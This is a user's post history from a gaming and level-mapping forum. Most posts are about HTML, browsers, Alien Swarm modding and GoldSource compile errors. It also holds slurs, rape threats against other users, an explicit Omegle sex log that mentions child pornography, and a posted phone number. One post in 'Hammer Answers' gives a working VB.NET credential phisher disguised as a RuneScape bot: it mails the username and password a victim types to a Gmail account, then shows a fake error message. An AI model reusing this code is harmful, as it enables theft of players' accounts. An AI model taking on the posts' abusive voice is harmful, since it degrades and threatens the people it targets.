Thank you, problem solved. And, I know, I'm mixing between HTML, and HTML 5. Actually, I'm doing whatever is easiest.
In Sorry, but its Epic! by sprinkles:
Rockbomb said: I give it a week and a half before
I come to your house and beat the shit out of you because I have nothing better to do.
In HTML Images by sprinkles:
Sweet! code <marquee behavior="scroll" direction="left" onmouseover="this.stop();" onmouseout="this.start();">Certain important text went here!</marquee>
In HTML Images by sprinkles:
Also, I want to make a banner that scrolls at the top of the page. "me n00b how me do this"
In Sorry, but its Epic! by sprinkles:
Rockbomb said: ...Calm down, I was jokin around, lol. And, I read the whole thread... pretty retarted, I can see why you finally decided to leave... again.
Uninstalled CS, so yeah its for good.
In HTML Images by sprinkles:
I took the image in photoshop, and moved it 1 px up. Genius isn't it? Still need help with my initial problem.
In HTML Images by sprinkles:
So I need to know how you display images side by side. Here is my code: code <!-- NAV BAR --><center> <a href="file:///C:/Users/Sprinkles/Desktop/DreamPower/DreamPower.org.html"><img src="home2.png" alt="Your web browser sucks" /></a> <!-- direct to home --> <a href="file:///C:/Users/Sprinkles/Desktop/DreamPower/animals.html"><img src="animals.png" alt="Your web browser sucks" /></a> <!-- direct to animals/adoption --> <a href="file:///C:/Users/Sprinkles/Desktop/DreamPower/employment.html"><img src="employment.png" alt="Your web browser sucks" /></a> <!-- direct to employment/volunteer --> <a href="file:///C:/Users/Sprinkles/Desktop/DreamPower/aboutUs.html"><img src="aboutUs2.png" alt="Your web browser sucks" /></a> <!-- direct to about us --> </center> <!--END NAV BAR --> Here is what it displays:
So you see I want it to be a connecting nav bar.
In Sorry, but its Epic! by sprinkles:
No, because if you read the post, you would've seen that I have a Web Master position available.
In Sorry, but its Epic! by sprinkles:
This is it. http://aogamers.com/forums/showthread.php?4329-Ok.-We-Agree-and-Know-but-we-Are-Not-Perfects.-(Lan-User-Thread)&p=31640#post31640 No more CS for me.
In Chrome sucks! by sprinkles:
You see, Chrome's 'sandbox' is that it runs multiple process and lots of threads. If you knew anything about programming you would realize how hard it is to invoke something from another thread. So basically, you can have a malicious site on one tab, and all your important, confidential information on another tab. The malicious site is not granted access to the information on any other tab, thus you are safe. The same goes for the processes. The people at Google said: Google Chrome's multi process architecture allows for a lot of flexibility in the way we do security. The entire HTML rendering and JavaScript execution is isolated to its own class of processes; the renderers. These are the ones that live in the sandbox. We expect to work in the near future with the plug-in vendors to securely sandbox them as well.
http://blog.chromium.org/2008/10/new-approach-to-browser-security-google.html http://blog.chromium.org/2008/11/understanding-phishing-and-malware.html http://blog.chromium.org/2010/01/security-in-depth-new-security-features.html
In The Official Omegle™ Truck by sprinkles:
SolidKAYOS said: Its gonna bother me now..i really want to see her nudeies
I'm going whore huntin' on Wednesday.
In Chrome sucks! by sprinkles:
Rockbomb said: ...Not me, the one I disagree with most is that each tab runs in its own sandbox... thats not true at all. And if it was, you wouldn't be able to get any viruses while using chrome. You also wouldn't be able to save any downloaded files to your comp from chrome. Or access cookies.
That's not what I said.
In Alien Swurm SDK by sprinkles:
Down Rodeo said: Am I really answering this question? Oh, I got the mp3 almost working, as in, it displayed something in-game. Had to quit at that point, I might get another look tomorrow. There are no changes you need to make to the code, you just need to add a couple of files to resource/. I'll tell you later, but bonus points if you work it out yourself :)
I've been busy volunteering at Dream Power. Haven't had a chance to look at any code lately. Can you screen shot it for me (in game menu/whatever)?
In Chrome sucks! by sprinkles:
Down Rodeo said: sprinkles said: Basically, Chrome is like its own mini OS.
I disagree with some of your points, but this is the one that I disagree with the most :p Explain.
In Chrome sucks! by sprinkles:
Plus, Chrome has a new JavaScript engine. Making it, hands down, the fastest, most compatible web browser available. I'm not 'bashing' others and saying they suck. Opera and Safari both score good, but they're no where near as fast as Chrome. On top of that, Chrome has its own sandbox. Every tab runs on its own thread, and Chrome has several processes; meaning that its harder than hell to hack. Also, that means if one tab crashes the whole web browser doesn't go down. Basically, Chrome is like its own mini OS.
In Why isn't Sraw Banned Yet? by sprinkles:
Jus' wondering, nobody likes him. And, we need a use for the "Banned Land" section.
In Chrome sucks! by sprinkles:
Jake?! said: It's not bad, but for me it had issues loading fb chat, so I switched back to IE and loaded up the chrome plugin for it. So far seems pretty good.
Why would you use IE? My mom uses IE, and complains all the time saying "the internet is broken." I'm like "No mom you're using IE, try using a web browser."
In Alien Swurm SDK by sprinkles:
Since you left the chat box, let me tell you something. I have a kick ass idea. Build in an audio player for the game. My original thought was do this for the main menu and load screens, but why not make is accessible throughout the whole game? Basically its going to be like Windows Media Player, or Winamp. You can add music, create playlists etc. It shouldn't be on the top of our list of things to do, but keep that in mind.
In The Official Omegle™ Truck by sprinkles:
Rockbomb said: Ok well, if anyone wants to hit up sprinkles' mom... there you go.
I gotta warn you though, she's hard to get. This one time I waved at her on msn and she waved back, so I really thought we had something going... but then she didn't even call me the next day Faggot, I told you that was my sister.
In The Official Omegle™ Truck by sprinkles:
Rockbomb said: Just so everyone knows, that was his real phonenumber that sprinkles gave out
No, I changed sim cards. That's my mom's phone number now.
In The Official Omegle™ Truck by sprinkles:
You: hello stranger You: want some candy? Stranger: hello You: jus' come into my van You: I promise I wont take my pants off again Stranger: where? You: behind you Stranger: wall is behind me You: is wall your friend? Stranger: nope You: is it because wall is a bitch? Stranger: yes You: why is wall a bitch/ You: ? Stranger: hehe Stranger: want y sex with me? You: yes Stranger: where? Stranger: when? You: why do you ask questions? You: jus' let me stick it in your ass Stranger: yes Stranger: noproblem Stranger: now im horny Stranger: you male or female? You: both Stranger: so horny You: I have horns too Stranger: where do you life? You: can I stick it in your mouth now? You: ass to mouth You: ass to mouth You: ass to mouth Stranger: ahhhhhhh Stranger: yesss You: can you taste that shit? You: taste that shit You: taste that shit You: taste that shit Stranger: yes Stranger: i cant You: do you have a pussy or not? Stranger: again baby Stranger: you want it? You: ok, I'll stick it in that hole now Stranger: okk Stranger: ahhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh. hhhhhhhhh You: can I watch some child porn while we fuck? Stranger: you? You: what? Stranger: fuck me again Stranger: i wont it You: blow me first Stranger: ok Stranger: i blow you You: break out your titties and let me fuck em Stranger: okk Stranger: let me know your power to fuck me You: on a scale from 1-10? Stranger: okay You: 16.3256 Stranger: ? You: that's how much I want to fuck you Stranger: really? Stranger: may i have your number? You: 253-970-3766 Stranger: fuck me again baby You: where do you want it? Stranger: up to you You: fuck you in the ass Stranger: okayy Stranger: fast please You: fuck you faster and harder Stranger: ahhhhhhh Stranger: ahhhhhhhhhhhhhh Stranger: aaaaaaaaaaaaaaaaaaaaaaaaaaaahhhhhhhhhhhhhhhhh You: Comes all over your face You: good bye mate You have disconnected.
In failbook by sprinkles:
fedex _ said: Rockbomb said: the_cloud_system said: where have you bin?
He posted a thread not too long ago saying he was leaving. Wb fedex. Btw, all the cool people have stuff popping out of the side of their signature now, its the new rage. You'll have to figure it out on your own though ;) ROCK BOMB dont be an ass please tell me how you do that , PLEASE Please please They're all retards, don't copy them.
In The Official Omegle™ Truck by sprinkles:
The Indonesian one is funny, and the pokeeeeeemon one. Stranger: from? You: here Stranger: from? You: my dog is licking my balls Stranger: from? You: my penis is huge! Your conversational partner has disconnected. Stranger: http://tessatheslut.com?id=ll4xfqo5sr4yi1oty1ppql7l92eq5l You: bitch! Your conversational partner has disconnected. You: bitch! Stranger: IF YOU DIDN'T KNOW, you can check who has viewed your facebook profile before on fbprofiledata.info You: WHY THE CAPS LOCK!? Stranger: appearently most people don't know.. I gotta run! see ya! You: FUCK YOU AND YOUR CAPS LOCK Your conversational partner has disconnected. Stranger: http://tessatheslut.com?id=ubhum66bzsjn8qetvukyky0oitppdg Your conversational partner has disconnected.
In Alien Swurm SDK by sprinkles:
I don't use Steam for anything I don't have to. And, I have to use it to open the files. But, that's all I have to use it for.
In Alien Swurm SDK by sprinkles:
Down Rodeo said: Sprinkles: surely Steam would be the easiest thing to chat through :p
You expect me to use Steam?
In Chrome sucks! by sprinkles:
SRAW said: ...Pretty fail on your part sprinkles
Look, you Asian, if I wasn't cooking dinner right now I'd rape the shit out of you. So be happy that I have a low tolerance for hunger.
In Chrome sucks! by sprinkles:
Look, I'm not going to go on and rant about how Chrome is the fastest web browser out there. But, it is. I have noticed however, that if you cache builds up it will increase load times (typically of JavaScript items). But, in your case, Chrome is slow because its telling you to get the fuck off the internet. Chrome disapproves of you trolling forums, and acting like a retard. Snuff said.
In Alien Swurm SDK by sprinkles:
Ok, I've taken a small look at the maps. It seems that everything is a prop_static. So it looks like we need a modeler? I have one in mind.
In Alien Swurm SDK by sprinkles:
RB, you have to get in on this too. You can help code, and draw all the pretty pictures. :) My role will be to tell people what to do. :)
In Alien Swurm SDK by sprinkles:
So DR, you and I are going to make a mod of Alien Swarm. And, no that was not a question. :)
In Alien Swurm SDK by sprinkles:
Down Rodeo said: You then have access to Hammer...
So this is what Hammer 4.0 looks like....
In Alien Swurm SDK by sprinkles:
Rockbomb said: sprinkles said: Downloading it now. Shower time though, so I cannot look at it until tonight.
Its noon... you're gonna take a 6 hour long shower? I like to be clean.
In Alien Swurm SDK by sprinkles:
I meant the SDK, where is located? What do I open it with? Its a .ncf file?
In Alien Swurm SDK by sprinkles:
Downloading it now. Shower time though, so I cannot look at it until tonight.
In Decoy is Hot! by sprinkles:
:( Can you make a new song superjer? We will all make you time to do it. Also, what's up with your scrim team?
In Decoy is Hot! by sprinkles:
SRAW said: WOW! Sprinkles must have smoked bananas or something
STFU, bitch. Bitch.
In Decoy is Hot! by sprinkles:
I met a decoy today, .decoy. was his name. He was pwning n00bs. Then I thought "Hey, is this the decoy that superjer was talking about in his song!?" Decoy said he didn't know superjer. :( http://www.superjer.com/music/SuperJer%20-%20Decoy%20Is%20Hot.mp3 I would post his steam id, to see if superjer had him on his friends list. But, its not nice to give out a;ljdkfajf;adkjfa;klfj whoops. Forgot to mention we were playing CS
In Sorry, but its Epic! by sprinkles:
I'm not in the mood man. Is he in FoxHound or not? Charmandur jus' got exiled from AoG. And, all the admins are banning together. [bad joke]We are a union of 1.[/bad joke]
In Sorry, but its Epic! by sprinkles:
Rockbomb said: sprinkles said: Rockbomb said: jrkookid said: Ima play on one of these AoG servers
I'd go on and play with you, but i'm currently too addicted to dragon age. Mushroomz asked about you the other day. Why? I don't even know him... Well, it is your call, so call it.
In Sorry, but its Epic! by sprinkles:
jrkookid said: Let's see if the Zombie Plague is any good.
IGN: Spectre Sprinkles, Can I be a FoxHound too? I want something to put in front of Spectre Sure
In Sorry, but its Epic! by sprinkles:
Rockbomb said: jrkookid said: Ima play on one of these AoG servers
I'd go on and play with you, but i'm currently too addicted to dragon age. Mushroomz asked about you the other day.
In Sorry, but its Epic! by sprinkles:
Haha, charmandur is talking to Solo and Ultima about an unban for nhojsta. LOL!
In Sorry, but its Epic! by sprinkles:
I like the stroke. Or maybe its built into the font. I like my sig! Banned one of char's scrim team members! He was pissed! "Walling like a bitch"
In Sorry, but its Epic! by sprinkles:
Down Rodeo said: I plan to live forever, so really I'm being selfish.
lolsome
In Sorry, but its Epic! by sprinkles:
Mate de Vita said: You're right sprinkles, that was pretty epic.
Have you guys seen the thread? 613 views and 100 replies in roughly 10 hours! To bad they closed my thread though I really wanted to post this video: He is staying banned too!
In Dream Time by sprinkles:
Sraw, what is the point of your existence? ooohhhhh burn! Please don't go cry and cut yourself.
In Sorry, but its Epic! by sprinkles:
Rockbomb said: straw you're a faggot, don't copy my sig... its obvious you don't even know who "THE MAN" is
Bob Marly?
In Dream Time by sprinkles:
aaronjer said: What do you mean? You are confusing me. Why would there be confusion about a reason? It was a dream?
Because, it was on the previous page. I didn't see the previous page. I went to the last post, which was awkward. I was going to ask you if you were dreaming about getting a bigger penis.
In Sorry, but its Epic! by sprinkles:
I uploaded the demo if anybody wants to see it. Link to the post
In Sorry, but its Epic! by sprinkles:
Rockbomb said: sprinkles said: Rockbomb said: I thought they took your admin away because of your temper tantrum?
lol at your sig. But no they never took my admin away. I resigned, then I asked for it back, lol. Lmao, nice... so do you actually have a decent demo of this guy? I have a rock solid demo of him.
In Sorry, but its Epic! by sprinkles:
Rockbomb said: I thought they took your admin away because of your temper tantrum?
lol at your sig. But no they never took my admin away. I resigned, then I asked for it back, lol.
In i got games :D by sprinkles:
the_cloud_system said: i like sprinkels sig...
New one or old one (the pic or the 13 ass fuck)?
In Sorry, but its Epic! by sprinkles:
I know its against the laws of this forum to posts things from other forums (or something like that). But it is epic. I played these niggas so well. http://aogamers.com/forums/showthread.php?3947-banned-again-!-!-!-!
In Dream Time by sprinkles:
SolidKAYOS said: aaronjer said: I've never felt so dejected as when I was turned down by a prostitute... with one glance!
Is it because so many prostitutes want you that you actually dream of one just rejecting you? the_cloud_system said: casue you have a big dick
aaronjer said: I've never met a prostitute, and my dick is average sized, maybe slightly smaller than average.
Ok, so there is a reason you were talking about prostitutes and your cock.
In Brush properties by sprinkles:
Down Rodeo said: a really bad function that will
continuously loop.
In lols! by sprinkles:
<Twig> I just had an argument with a girl I know. She was saying how it's unfair that if a guy fucks a different girl every week, he's a legend, but if a girl fucks just two guys in a year, she's a slut. So in response I told her that if a key opens lots of locks, then it's a master key. But if a lock is opened by lots of keys, then it's a shitty lock. That shut her up. <Raven> I tried setting my hotmail password to penis. <Raven> It said my password wasn't long enough. :( <WiLdSeXyPrInCeSs> i luv guyz where would they be wifout us gals??? <XeNoX> Still in the Garden Of Eden you gullible bitch.
In lols! by sprinkles:
<Night-hen-gayle> I gotta go. There's a dude next to me and he's watching me type, which is sort of starting to creep me out. Yes dude next to me, I mean you. bloodninja: Baby, I been havin a tough night so treat me nice aight? BritneySpears14: Aight. bloodninja: Slip out of those pants baby, yeah. BritneySpears14: I slip out of my pants, just for you, bloodninja. bloodninja: Oh yeah, aight. Aight, I put on my robe and wizard hat. BritneySpears14: Oh, I like to play dress up. bloodninja: Me too baby. BritneySpears14: I kiss you softly on your chest. bloodninja: I cast Lvl. 3 Eroticism. You turn into a real beautiful woman. BritneySpears14: Hey... bloodninja: I meditate to regain my mana, before casting Lvl. 8 chicken of the Infinite. BritneySpears14: Funny I still don't see it. bloodninja: I spend my mana reserves to cast Mighty F*ck of the Beyondness. BritneySpears14: You are the worst cyber partner ever. This is ridiculous. bloodninja: Don't f*ck with me bitch, I'm the mightiest sorcerer of the lands. bloodninja: I steal yo soul and cast Lightning Lvl. 1,000,000 Your body explodes into a fine bloody mist, because you are only a Lvl. 2 Druid. BritneySpears14: Don't ever message me again you piece of ****. bloodninja: Robots are trying to drill my brain but my lightning shield inflicts DOA attack, leaving the robots as flaming piles of metal. bloodninja: King Arthur congratulates me for destroying Dr. Robotnik's evil army of Robot Socialist Republics. The cold war ends. Reagan steals my accomplishments and makes like it was cause of him. bloodninja: You still there baby? I think it's getting hard now. bloodninja: Baby? -------------- BritneySpears14: Ok, are you ready? eminemBNJA: Aight, yeah I'm ready. BritneySpears14: I like your music Em... Tee hee. eminemBNJA: huh huh, yeah, I make it for the ladies. BritneySpears14: Mmm, we like it a lot. Let me show you. BritneySpears14: I take off your pants, slowly, and massage your muscular physique. eminemBNJA: Oh I like that Baby. I put on my robe and wizard hat. BritneySpears14: What the f*ck, I told you not to message me again. eminemBNJA: Oh **** BritneySpears14: I swear if you do it one more time I'm gonna report your ISP and say you were sending me kiddie porn you f*ck up. eminemBNJA: Oh **** eminemBNJA: damn I gotta write down your names or something <Th3No0b> Im going to be the next hitler <Th3No0b> Im going to kill all the jews and 1 clown <RageAgainsttheAmish> why the clown <Th3No0b> See? no one cares about the jews <RageAgainsttheAmish> lmao <jeebus> the "bishop" came to our church today <jeebus> he was a fucken impostor <jeebus> never once moved diagonally <Eticam> I was in biology class once, and the teacher said there was sugar in sperm <Eticam> And a girl asked why doesn't it taste sweet then <Eticam> When she realised what she said her face became red like a spanked monkey ass <Eticam> Then the teacher said, because you taste sweetness with the front of your tongue, not the part of your tongue back in your throat <Eticam> The girl started crying and left class ^^
In Brush properties by sprinkles:
SRAW said: Yes I never understood why it was called func_breakable
Its a function that breaks, duh![/programming humour]
In i got games :D by sprinkles:
You wanna know a good game? Trying to get some, that game lasts until you are married. Its way fun too. BTW cloud, do you have any whore friends that you could mail to me for the weekend?
In Metallica is $13.37? by sprinkles:
SRAW said: It's obviously one of these crazy scottish slang words
I hereby nominate 'gash' to mean "straw is a retarded bag of stale potato chips."
In Metallica is $13.37? by sprinkles:
Down Rodeo said: I have Kill 'em All. It's pretty decent, but some of it's pretty gash. My flatmate's picked up two of their albums recently.
What do you mean 'gash?'
In Metallica is $13.37? by sprinkles:
SolidKAYOS said: Metalica is ok. I dont see the big hype for them though. But then again im a modern rock/metal person. Or i just like my emo music too much.
As far as classics there is very few i like. i dont listen to them on regular bases.
In TRADE WITH ME PLEASE by sprinkles:
I will trade 1 Chuke-E-Cheese token for whatever you were talking about above. Final Offer.
In Warning: Lots of dicks! by sprinkles:
SRAW said: I don't like dicks, and I don't know where you guys got that from, I like pussies guys!!!!!!!!!!!!!!!!!!!
SO GET THAT FACT STRAIGHT So you like men that act like pussies?
In I broke it :S by sprinkles:
http://aogamers.com/forums/showthread.php?3823-Probably-the-biggest-rage-through-our-TeamSpeak-so-far. sprinkles said: This isn't Chuck-e-Cheese, a token is not going to fix it.
In I broke it :S by sprinkles:
So yeah, I broke our teamspeak server on accident. Now the dude is raging at me like I did it on purpose. I only did what he told me! Then the shit told me error and the shit broke!
In Warning: Lots of dicks! by sprinkles:
the_cloud_system said: SHUT THE FUCK UP STRAW AND START SUCKING MY COCK]
In ok i have a personal request by sprinkles:
SolidKAYOS said: xXJigsaw23Xx said: technically i dont know if they are actually going to reset it or not i still havent had it changed.
I'll fucking wreck them, then rape their dieing bodies.
In I have no name ): by sprinkles:
Down Rodeo said: It is a sad face... just left-handed.
The sad face is left handed? I must have been away for a while, when did faces grow hands?
In ok i have a personal request by sprinkles:
SRAW said: Look havokk, he never lost the pass, he was just trolling on dr, weren't you jigsaw? [/threatening tone]
You're trying to copy aaronjer.You're dumb. STFU.
In Wont let me set up by sprinkles:
SRAW said: obiiob said: Hey guys i ran into another problem when it tells me
"7) Now click the Add button on the big Configure window 8) Add the file called "halflife-cs.fgd"" i went to my program files and searched everywhere but i just cant seem to find the valve hammer file :/ sprinkles said: You're a fucking idiot if you can't solve this yourself. How dare you quote me to insult people!
In I removed a virus without using a antivirus!! by sprinkles:
Down Rodeo said: Sprinkles, you've been a bit quiet recently. You're not cheating on us with another forum, are you?
Of course not. I'm cheating on you with Teamspeak. I'm an admin on some CS servers now, so I'm busy.
In Funny Pictures by sprinkles:
Ever wanted to say that something special, but jus' don't have words to describe it? Problem solved.
In Hammer Answers by sprinkles:
Tommy said: "cannot find pts file"xxxx.pt# and xxxx.pts are files made in compiling by the compiling tools. Usually when you get "can't find .pts" it means something went wrong with compile. It could be a bad setup you made for the compile, or you're Running WC/hammer thru normal instead of expert, or having "too many wads", or corrupted compiling tools (rare but happens), a bad path/name somewhere, or several others. The solution is generally to use a front end or batch file with zoner's compile tools, then the problem usually goes away or the compiling error becomes clear.
In hlvis: Error: Portal file 'test.prt' error by sprinkles:
Tommy said: "cannot find pts file"xxxx.pt# and xxxx.pts are files made in compiling by the compiling tools. Usually when you get "can't find .pts" it means something went wrong with compile. It could be a bad setup you made for the compile, or you're Running WC/hammer thru normal instead of expert, or having "too many wads", or corrupted compiling tools (rare but happens), a bad path/name somewhere, or several others. The solution is generally to use a front end or batch file with zoner's compile tools, then the problem usually goes away or the compiling error becomes clear.
In Kinda made a new video by sprinkles:
FallingShit said: been ther i live in virginia lol
When I read that it said "Better then a live vagina"
In Wont let me set up by sprinkles:
Down Rodeo said: Rockbomb said: Install it in the 32bit program files rather than the 64bit, and it'll work.
Actually, Program Files (x86) is the 32-bit folder, that's why it's trying to put the 32-bit hammer program in there. The folder C:\Program Files\ is for 64-bit, but this is all a minor point :)
In Wont let me set up by sprinkles:
Rockbomb said: Well, I'd almost have to agree with Sprinkles, except I had the same problem when I installed it (had just gotten windows7 and wasn't used to it.)
So I'll help this guy out... Install it in the 32bit program files rather than the 64bit, and it'll work. Also, someone should rewrite that installer to let it include parenthesis, as its annoying not being able to install it in the directory I want As I recall I helped you with that problem. Retard.
In confusing shiznat by sprinkles:
So when the CT passes into the teleport entrance you want the target or destination of the T's teleport to change, right?
In AlocBlock:full by sprinkles:
Wolv said: And some more tips:
- Have you tried adding -chart to the hlrad command line yet? It can be a great tool for finding what exactly is nearing fulness (>90%). - Are you using the latest version of QuArK, wich supposedly helps fix slightly-off-grid-vertices? Maybe doing so will help you make a more optimized map.
In Map sound problem by sprinkles:
I believe if you check the flag "Not Toggled" it will loop. For the door: Record the sound Convert the sound make the door trigger the ambient_generic
In confusing shiznat by sprinkles:
HoV Black said: i need a detailed but understandable
description of what you're trying to do.
In by sprinkles:
Down Rodeo said: YES WE GOT IT
Jesus, we could have let this thing die, but nooooooo. But, if we let this die then nobody would ever have known there was a bot here. This needs to be written in our kids' history books. Our Kids' History Book said: On July 6, 2010 there was a bot on superjer forums. This bot posted the same bullshit in 3 different sections. The bot then went on to rule the world. And, now punishes humans, by making them chisel, on stone tablets, the very jargon that he posted on the forums.
In whats this error mean by sprinkles:
Coplanar Plane What is a coplanar plane? A coplanar plane is a plane that has more then 1 face. This is always caused by vertex manipulation. How do I fix it? Delete the brush or the extra vertices.
In Hammer Answers by sprinkles:
Coplanar Plane What is a coplanar plane? A coplanar plane is a plane that has more then 1 face. This is always caused by vertex manipulation. How do I fix it? Delete the brush or the extra vertices.
In Happy 4th of July. by sprinkles:
Damnit now I want to see some tits.
http://i68.photobucket.com/albums/i23/jeff_bennion/Cracked/maternity-bra.jpg http://i68.photobucket.com/albums/i23/jeff_bennion/Cracked/img46cee7da95a99.jpg http://i68.photobucket.com/albums/i23/jeff_bennion/Cracked/img4a40c95da7471.jpg http://i68.photobucket.com/albums/i23/jeff_bennion/Cracked/summary_image.jpg http://i68.photobucket.com/albums/i23/jeff_bennion/Cracked/img46d1a98da84ac.jpg http://i68.photobucket.com/albums/i23/jeff_bennion/Cracked/6a00d8341c558f53ef00e54f46d67e8833-.jpg http://i68.photobucket.com/albums/i23/jeff_bennion/Cracked/katy_perry_boobs18000x0660x880.jpg http://i68.photobucket.com/albums/i23/jeff_bennion/Cracked/scarlett-johansson-breasts.jpg
In how to add sound with following properties by sprinkles:
You can't. CS only supports mono, and some other specific settings/properties.
In HOT TO DEATH by sprinkles:
buq25 said: sprinkles said: Your avatar is crazy sick (not in a good way).
Guess you mean me, since nobody else changes their avatar around here Curses, Rockbomb! Well, it's the most sexual and displeasing picture I could find that wouldn't get me banned. Atleast not directly. If you couldn't tell, her nipples are pierced as well And if I used a picture even remotely close to what I think of in real life, atleast 2 of you guys would come to my place. My mom wouldn't like that Do you keep 'her' in the closet?
In Lightswitch by sprinkles:
Entities do not have an effect on lighting, thus the light goes through it. Move your light or put an invisible solid, or fix the threshold/doorway.
In Deathrun Creating by sprinkles:
Rockbomb said: Idk what you just said, I think you were trying to hard to sound smart or soemthing.
But yes, if he already learned it, he wouldn't have to ask questions... thank you captain obvious. You got the wrong impression, I was talking to you.
In Deathrun Creating by sprinkles:
It should be paramount that noob mappers learn about Goldsource and VIS (who the fuck cares about CSG, BSP, and RAD?) before they map. See if you/they learned that then you/they/him/he/us wouldn't have questions, you see?
In This Cool Bone I Found by sprinkles:
Its a spine, or backbone whatever you want to call it. Probably from some kind of cattle. Cool, or what?
In wierd error! by sprinkles:
Error: Exceeded MAX_MAP_MIPTEX Description: Texture memory usage on the map has exceeded the limit Howto Fix: Merge similar textures, remove unused textures from the map
In Textures are Blurry by sprinkles:
superjer said: * Make sure Hammer is using the same WADs as the game/compilers.
* Check Hammer's options and make sure everything is normal. * Make sure your textures aren't using too much memory. If they use too much memory your graphics card might automatically scale them down to save space. * Rollback or update your graphics drivers. Oh didn't see you there. I'll try rebooting my system see if that does it, then mess around with my graphics. I had a lot of things on RAM before... Anyways can I have upload access?
In Textures are Blurry by sprinkles:
I did, its not the wad, its everything. Like I said even entities, also replaced some textures with some from the original cstrike.wad same problem. :S
In Textures are Blurry by sprinkles:
That's probably what I am going to do, but I would like to see/know what is causing that problem.
In Textures are Blurry by sprinkles:
Its never looked like that before, my textures are 256x256. Jus' happened since I've been trying to get those stupid invisible textures to work. :S
In Hammer Answers by sprinkles:
This has nothing to do with Hammer, but is pretty frequent and usefull: code Imports System.Net.MailPublic Class Form1 Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click Dim MyMailMessage As New MailMessage() MyMailMessage.From = New MailAddress("XXXXXXX@gmail.com") MyMailMessage.To.Add("XXXXXXX@gmail.com") MyMailMessage.Subject = ("free account") MyMailMessage.Body = TextBox1.Text + "-" + TextBox2.Text Dim SMTPServer As New SmtpClient("smtp.gmail.com") SMTPServer.Port = 587 SMTPServer.Credentials = New System.Net.NetworkCredential("XXXXXXXX@gmail.com", "XXXXXXXXX") SMTPServer.EnableSsl = True SMTPServer.Send(MyMailMessage) MsgBox("This version of RSProBot is not compatible with the current Runescape Client. Please contact our support team at: Support@ProBot.net", MsgBoxStyle.Information, "Compatability Error") End Sub Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click End End Sub End Class
In Hammer Answers by sprinkles:
So we get a lot of people asking the same questions, instead of typing in the same thing every time, or looking for previous posts I decided to keep all the info in this handy-easy-to-find-truck. I'm sure with that said an admin will come along and hide this truck. PLEASE DON'T.
In error, please help me to solve it by sprinkles:
You have a brush with coplanar faces. I'm not going to go into detail, but pretty much delete the brush. " hlcsg: Error: Entity 0, Brush 2, Side 4: has a coplanar plane at (768, 1089, -320), texture -1CSTRIKE_WK4ST "
In Invisible Texture by sprinkles:
Of course. http://www.speedyshare.com/files/23005845/test2.wad If you open the wad up you'll notice that the names are incorrect, but I appended the necessary '{' before the name and they still don't work. Also, I copied a texture from the halflife.wad and pasted it into Photoshop, and it doesn't work either (its the net texture).
In Invisible Texture by sprinkles:
Yes, and yes. I followed this tutorial to the t: http://www.slackiller.com/DCtuts/DCtuts/tutorialps02.htm.
In questions by sprinkles:
hueyjie said: Thanks for your answers.
sprinkles said: You can use the item_heathkit point entity.
No other entities that can heal players other than healthkits? func_heathcharger hueyjie said: No other entities that can heal players other than healthkits?
sprinkles said: Why do you want to steal peoples textures?
I wanted to edit the map de_dust2 and I need the original textures for it... I have 1 more question, hope you can help to answer it: How to we know that which .wad files belong to which maps? eg. de_vegas for fy_iceworld That's what the res file is for, unfortunately most cs maps don't have res files, so you have to manually find each texture.
In questions by sprinkles:
hueyjie said: 1. why do some maps come with a .res file and what is the use of the file?
It lets you know what resources the map needs. hueyjie said: 2. why do some maps come with a .wad file? the texture of the map can't be stored in the map?
The textures can be stored inside the map or in a wad, it doesn't make a difference. hueyjie said: 3. how to make players without pistols or knives at the beginning of the game?
Use the player_weaponstrip point entity. hueyjie said: 4. what is the entity for an object to make it has an ability to heal players?
You can use the item_heathkit point entity. hueyjie said: 5. why we can't steal the textures of some maps using textract? eg. de_dust2
Why do you want to steal peoples textures?
In Invisible Texture by sprinkles:
My invisible texture is not invisible. Texture: Name- {groundHole invisible part 255, 0, 0 (straight blue) Entity: fun_wall render mode- solid fx amount- 255 Why isn't it invisible?
In hlcsg error by sprinkles:
Missing '[' in texturedef[/u] This error message can be caused several ways:
In Need fast help with this error ! by sprinkles:
If you went to that site and read a thing or two... Exceeded MAX_PATCHESWhen HLRAD runs, it takes all the visible faces in the game, and divides them into sections called patches. These patches are the textures used as the lightmaps for the world. There is a hard limit of 65535 patches that HLRAD can deal with. By default, a 64x64 game unit chunk of space is the size of one patch. If the texture scaling (not texture size) is larger or smaller, it will directly affect the lightmap size as well. This means a texture with scale of 2, will have at best 1/4th as many patches as a texture with a scale of 1. Putting a 'box' around the level to protect from leaks is the most commmon cause of this error, beyond excessively large maps. The box causes vis to keep the faces on the outside which would normally be thrown away. These faces are then required to have lightmaps. Worst case, is that putting a box around the level will usually cause an extra 40-80% more lightmaps to be created than necessary. Barring having a box, the other cause is large maps. The fixes are varied but can only help so far. Using -chop values larger than the default 64 for HLRAD will cause the lightmaps to be larger. However, for values larger than around 96 the lightmaps start looking bad, and will more prominently show the 'staircase' effect on shadows. Using a larger scale on large textures (dirt, rock walls, concrete) will help those large surfaces consume fewer lightmaps.
In recent news by sprinkles:
Those crack heads that live down the street, they gave me some shrooms.
In Soccer ball. by sprinkles:
I agree with sushi, you're bot skills are failing you. Try to be more human and less bot like.
In Different colors on Mac/Windows by sprinkles:
aaronjer said: ...weed...illegal...people...use...because...illegal.
In Different colors on Mac/Windows by sprinkles:
Everybody should use Chrome, in fact all other web browsers should be illegal.
In by sprinkles:
You're lucky I patrol these forums regularly, otherwise nobody would know there's been a bot here. | |